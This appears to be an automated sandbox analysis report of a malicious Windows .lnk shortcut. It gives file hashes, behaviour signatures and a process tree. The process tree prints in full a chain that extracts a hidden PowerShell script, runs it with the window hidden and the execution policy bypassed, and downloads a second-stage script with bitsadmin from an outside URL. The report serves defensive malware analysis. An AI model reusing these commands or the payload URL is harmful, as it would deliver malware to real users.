Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25-08-2024 19:01

General

  • Target

    pack-KRJ88981-99192.lnk

  • Size

    2KB

  • MD5

    4163cb3655dfdae03d13d623dd9dc8db

  • SHA1

    6183474325319e89dcf02e9bd54220d1d912638b

  • SHA256

    0984a28618d50bee71deec7824b449bbe04b04b0951fe4d8dcf8a3ffa7691bb7

  • SHA512

    b5205aa5686fed2f93edcd42729fad49572fe3424459d93c32139460bf3d06ee4d18d2391800965d97129e1f39c932409f1b58388bc70841624c4f11718c8a8d

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\pack-KRJ88981-99192.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk > C:\Users\Admin\\Documents\\blue.ps1 & cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Windows\system32\findstr.exe
        findstr /s jhdfkweinwefa C:\Users\Admin\\*.lnk
        3⤵
          PID:2960
        • C:\Windows\system32\cmd.exe
          cmd /c powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2756
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\blue.ps1
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2796
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\ilxmNkDcyfpSBn.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2632
              • C:\Windows\system32\bitsadmin.exe
                bitsadmin /transfer jhdfkweinwefa /download /priority FOREGROUND "https://jotaortega.com/white/tino.ps1" C:\Users\Admin\AppData\Roaming\\ilxmNkDcyfpSBn.ps1
                6⤵
                • Download via BitsAdmin
                PID:2776

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Documents\blue.ps1

      Filesize

      941B

      MD5

      367a305a4630d346d724dbb691efb600

      SHA1

      d6c8eaad2c33dc6c1e6a78bcce5be7f1c6d31ecd

      SHA256

      eb806b5998540137f2d368ba7bd613d5cadf65c683467c0be55f8f4c2cd3caea

      SHA512

      9484ee11a52aa8f26c85e94ebd326a75df52d33186ecbcfa118895ec39b5a1a9ede48ddabdae830294596ee9bd4827bb56c04b01e54ae6dd341ed10db2b61b11

    • memory/2796-41-0x000000001B730000-0x000000001BA12000-memory.dmp

      Filesize

      2.9MB

    • memory/2796-42-0x0000000001E00000-0x0000000001E08000-memory.dmp

      Filesize

      32KB